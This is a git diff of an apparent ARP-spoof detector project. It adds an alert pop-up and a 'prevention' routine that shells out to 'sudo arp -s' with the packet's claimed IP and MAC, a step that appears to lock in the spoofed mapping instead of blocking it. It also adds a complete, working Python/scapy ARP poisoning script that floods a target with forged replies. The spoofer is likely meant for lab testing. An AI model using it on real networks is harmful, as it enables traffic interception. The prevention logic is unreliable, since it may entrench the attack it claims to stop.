diff --git a/arpsniffer b/arpsniffer
index 5393c47e80a39eb3fd1f301d30895dea92505e9d..867d5eaa72b43f36abd1837dad341f8d5f375777 100755
Binary files a/arpsniffer and b/arpsniffer differ
diff --git a/arpsniffer.c b/arpsniffer.c
index 4e08494934882d76bcae1fff291c27528e5fa01a..2b6aac98e344291f513a1b6550259269f559cccf 100644
--- a/arpsniffer.c
+++ b/arpsniffer.c
@@ -45,6 +45,21 @@ int print_available_interfaces()
return 0;
}
+void prevent_arp_spoofing(char *attacker_ip, char *attacker_mac) {
+ char command[256];
+ printf("Blocking attacker: IP: %s, MAC: %s\n", attacker_ip, attacker_mac);
+
+ snprintf(command, sizeof(command), "sudo arp -s %s %s", attacker_ip, attacker_mac);
+
+ int result = system(command);
+
+ if (result == 0) {
+ printf("ARP entry added successfully to prevent spoofing.\n");
+ } else {
+ printf("Failed to add ARP entry. Please run with sufficient privileges.\n");
+ }
+}
+
void print_version()
{
printf("ARP Spoof Detector Project\n");
@@ -80,6 +95,14 @@ char *get_ip_address(uint8_t ip[4])
return m;
}
+void arp_spoof_alert(char *attacker_ip, char *attacker_mac){
+ system("yad --title='WARNING: Serious Alert!' --text='Your System might be under ARP Spoofing Attack!' --button='OK:0' --width=400 --height=150 --image='dialog-error' --no-buttons --center --background='#660000' --timeout=5 --timeout-indicator=bottom");
+ prevent_arp_spoofing(attacker_ip, attacker_mac);
+
+ exit(0);
+}
+
+
int sniff_arg(char *device_name)
{
char error[PCAP_ERRBUF_SIZE];
@@ -140,10 +163,9 @@ int sniff_arg(char *device_name)
printf("---------------------------------------------------------------\n");
counter++;
ltimer = time(NULL);
-
if (counter > 20)
{
- printf("ARP Spoof Alert\n");
+ arp_spoof_alert(s_ip, s_mac);
}
}
}
@@ -151,6 +173,8 @@ int sniff_arg(char *device_name)
return 0;
}
+
+
int main(int argc, char *argv[])
{
if (argc < 2 || strcmp("-h", argv[1]) == 0 || strcmp("--help", argv[1]) == 0)
diff --git a/arpspoofer.py b/arpspoofer.py
new file mode 100644
index 0000000000000000000000000000000000000000..a9fc5fec81bd801296e0df70956053b471a94864
--- /dev/null
+++ b/arpspoofer.py
@@ -0,0 +1,69 @@
+import time
+import argparse
+import signal
+from scapy.all import ARP, Ether, sendp, getmacbyip, conf, get_if_addr, get_if_hwaddr
+
+spoof_ip = None
+target_ip = None
+target_mac = None
+spoof_mac = None
+interface = None
+
+def usage():
+ print("Usage: python arpspoof.py -i <interface> -t <target> <host>")
+ exit(1)
+
+def arp_send(interface, op, sha, spa, tha, tpa):
+ ether = Ether(src=sha, dst=tha)
+ arp = ARP(op=op, psrc=spa, pdst=tpa, hwsrc=sha, hwdst=tha)
+ packet = ether / arp
+
+ sendp(packet, iface=interface, verbose=False)
+
+def arp_find(ip):
+ mac = getmacbyip(ip)
+ if mac is None:
+ print(f"Couldn't find MAC address for IP {ip}.")
+ return None
+ return mac
+
+def cleanup(sig, frame):
+ global spoof_mac, spoof_ip, target_ip, target_mac
+ if spoof_ip and spoof_mac:
+ for _ in range(3):
+ arp_send(interface, 2, spoof_mac, spoof_ip, target_mac, target_ip)
+ time.sleep(1)
+ exit(0)
+
+def main():
+ global spoof_ip, target_ip, spoof_mac, target_mac, interface
+
+ parser = argparse.ArgumentParser(description="ARP Spoofing Script")
+ parser.add_argument("-i", "--interface", type=str, required=True, help="Network interface to use")
+ parser.add_argument("-t", "--target", type=str, required=False, help="Target IP address")
+ parser.add_argument("host", type=str, help="Host IP to spoof")
+ args = parser.parse_args()
+
+ interface = args.interface
+ spoof_ip = args.host
+ target_ip = args.target
+
+ spoof_mac = get_if_hwaddr(interface)
+ if spoof_mac is None:
+ print(f"Couldn't get MAC address for the interface {interface}.")
+ exit(1)
+
+ if target_ip:
+ target_mac = arp_find(target_ip)
+ if target_mac is None:
+ exit(1)
+
+ signal.signal(signal.SIGINT, cleanup)
+ signal.signal(signal.SIGTERM, cleanup)
+
+ while True:
+ arp_send(interface, 2, spoof_mac, spoof_ip, target_mac if target_ip else None, target_ip if target_ip else None)
+ time.sleep(2)
+
+if __name__ == "__main__":
+ main()